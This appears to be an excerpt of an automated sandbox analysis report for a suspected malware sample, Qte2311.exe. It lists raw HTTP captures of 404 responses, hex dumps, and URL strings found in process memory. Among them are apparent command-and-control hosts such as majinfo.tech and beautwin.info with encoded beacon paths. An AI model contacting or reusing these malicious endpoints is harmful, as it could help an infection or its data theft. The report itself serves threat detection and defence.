2f e0 e9 c4 29 ce 9e 7f 41 f9 41 23 3c 92 bd 93 66 09 e5 74 f0 26 60 26 40 91 0f 93 05 b5 39 1f 19 cf 9d 38 d5 36 1f 0a a1 79 96 21 ba 7d d1 5b d9 64 df 9e a1 ec 1d 31 8f 4c e4 55 08 71 1f e2 54 87 b7 d2 e3 43 cd 1f 49 05 99 f7 e4 a7 e9 4d a2 0c d6 af f2 05 43 62 fa 5b f8 97 f3 d5 5b 0f 21 90 0f 3f 3e 90 69 22 d1 8b 61 9e f1 78 dd 55 36 c4 57 68 20 19 55 7b 97 fb 38 b9 e3 c3 72 a7 71 14 cb 0d 9a fb 2a fa 27 cc 85 b9 08 39 c8 e4 8e 1f 48 7e 02 a8 72 3a 3e e6 ff 5b 35 40 95 d0 b0 17 e3 f7 ae eb c0 62 60 82 14 31 1c 37 24 a9 cf 1a 27 e9 49 2f 1b 30 f2 0a fe 28 9f e5 65 f0 86 14 c4 2a ba 39 f7 f1 c9 69 58 92 bf 76 5b 2c 9f e5 45 f4 6d ff 35 dd 13 bb 8c 1b e3 4a 69 8e d6 59 05 a4 20 b4 5e 96 eb 4d 56 ca 74 03 7e da 06 f0 27 f0 47 d4 1d 90 82 64 bb 34 dd ac ee 57 f7 19 d9 ce 3a 1c 97 52 da 7d 41 68 90 a4 6e d8 f3 51 57 30 a4 e0 fd 0c a4 20 23 ed 5d c0 23 5e 7b 08 34 7f 74 89 a2 9c 2a 7f 77 4f 9c 1e 06 e8 b3 1c 1b 7d 02 4f f3 5a 9a 00 9c 76 f2 72 2c 06 e7 4b f3 2c db a5 9c 4e db 5e 1a 8f a5 07 f9 32 3d cb ae d3 7c b7
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 21 Nov 2023 03:47:06 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d c2 c9 37 4a 42 a3 eb 4d 67 17 a4 61 d0 52 d4 02 59 a3 41 69 68 19 0c c2 86 5c f9 b1 6c 36 f4 e0 de 72 13 ea a6 b2 5f ea f7 39 7f 07 4c e8 1e 7e 54 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 21 Nov 2023 03:47:09 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d c2 c9 37 4a 42 a3 eb 4d 67 17 a4 61 d0 52 d4 02 59 a3 41 69 68 19 0c c2 86 5c f9 b1 6c 36 f4 e0 de 72 13 ea a6 b2 5f ea f7 39 7f 07 4c e8 1e 7e 54 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 21 Nov 2023 03:47:12 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d c2 c9 37 4a 42 a3 eb 4d 67 17 a4 61 d0 52 d4 02 59 a3 41 69 68 19 0c c2 86 5c f9 b1 6c 36 f4 e0 de 72 13 ea a6 b2 5f ea f7 39 7f 07 4c e8 1e 7e 54 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 596Connection: closeDate: Tue, 21 Nov 2023 03:47:15 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 21 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 52 52 4f 52 20 34 30 34 3a 20 41 52 43 48 49 56 4f 20 4e 4f 20 45 4e 43 4f 4e 54 52 41 44 4f 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 61 64 6f 20 6e 6f 20 68 61 20 73 69 64 6f 20 65 6e 63 6f 6e 74 72 61 64 6f 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE 
html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404! </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> ERROR 404: ARCHIVO NO ENCONTRADO </h1> <p style="font-size:0.8em;"> El documento solicitado no ha sido encontrado. </p> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Nov 2023 03:49:00 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 
3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Nov 2023 03:49:02 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6d 65 79 65 72 2d 72 65 73 65 74 2f 32 2e 30 2f 72 65 73 65 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 2b 43 6f 6e 64 65 6e 73 65 64 3a 34 30 30 2c 37 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 41 22 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 42 22 3e 34 30 34 3c 2f 70 3e 0a 20 20 3c 61 20 63 6c 61 73 73 3d 22 74 65 78 74 43 22 20 68 72 65 66 3d 22 23 22 3e 47 6f 20 42 61 63 6b 3c 2f 61 3e 0a 09 3c 73 76 67 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 
3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Nov 2023 03:49:05 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/html
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 21 Nov 2023 03:49:08 GMTServer: ApacheContent-Length: 38381Connection: closeContent-Type: text/html; charset=utf-8
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: runas.exe, 00000005.00000002.4111828153.0000000005C9C000.00000004.10000000.00040000.00000000.sdmp, SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000006.00000002.4111192634.0000000002CFC000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://majinfo.tech/u0t4/?ipNhfX=pk6UlYKypwTcdRigHYvXwaXnbRoM4y7Rx6CIM21Q8kT0nxxz4tr7Q0wSojmMfoxURV3
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000006.00000002.4112751234.0000000004822000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.beautwin.info
Source: SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000006.00000002.4112751234.0000000004822000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.beautwin.info/u0t4/
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: runas.exe, 00000005.00000002.4111828153.00000000057E6000.00000004.10000000.00040000.00000000.sdmp, SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000006.00000002.4111192634.0000000002846000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2051780672.000000000CE96000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.drtonks.com/
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: runas.exe, 00000005.00000002.4110106920.0000000003363000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.pjgfupyp.click/
Source: runas.exe, 00000005.00000002.4110106920.0000000003363000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.pjgfupyp.click/2
Source: runas.exe, 00000005.00000002.4110106920.0000000003363000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.pjgfupyp.click/do6
